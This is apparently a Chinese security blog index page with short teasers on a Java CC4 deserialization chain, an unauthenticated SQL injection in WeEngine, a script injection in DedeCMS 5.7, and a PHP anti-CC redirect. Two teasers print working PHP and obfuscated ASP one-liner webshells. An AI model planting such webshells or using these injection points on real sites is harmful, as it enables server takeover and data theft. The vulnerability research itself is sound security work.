代码审计 原创 | Java安全之CC4链 点击上方蓝字 关注我吧0x00 前言继续来分析一波CC4的链,在写该文前,看到网上大部分的文章都只给了一个调用链和POC。其实看CC4调用链的时候,能看出来CC4的调用链用到的也是前面的一些类去构造,... 11月03日 120 views 发表评论 阅读全文
安全文章 一些常用的一句话分享 php-基本 <?php eval($_POST) ?><?php @eval($_POST);?>php变形记 <?php $a = str_replace(x,"",... 09月04日 105 views 发表评论 阅读全文
漏洞时代 微擎科技最新版某处无需登录sql注入 文件/payment/unionpay/notify.php着重对其实主要是对uni_setting进行查看。跟进uni_setting 01月01日 470 views 发表评论 阅读全文
漏洞时代 dede5.7前台插入恶意JS代码 这个问题应该很久了 最近发现有用这个的蠕虫 dede 前台提交友情链接 只用htmlspecialchars简单处理了一下 可以插入代码 plus/flink_add.php 提交 12月31日 190 views 发表评论 阅读全文
moonsec_com 发个一句话 最近有点事,博客没有经常更新。 今天发个一句话吧。 <% wei="日日日)""wei""(tseuqer lave 日" execute(UnEnc ode(wei)) f... 11月21日 327 views 发表评论 阅读全文
颓废's Blog PHP采用301跳转方式防CC拦截 PHP采用301跳转方式防CC拦截 降低CC攻击的效果 <?php empty($_SERVER) or exit('Access Denied'); $seconds ... 05月19日 322 views 发表评论 阅读全文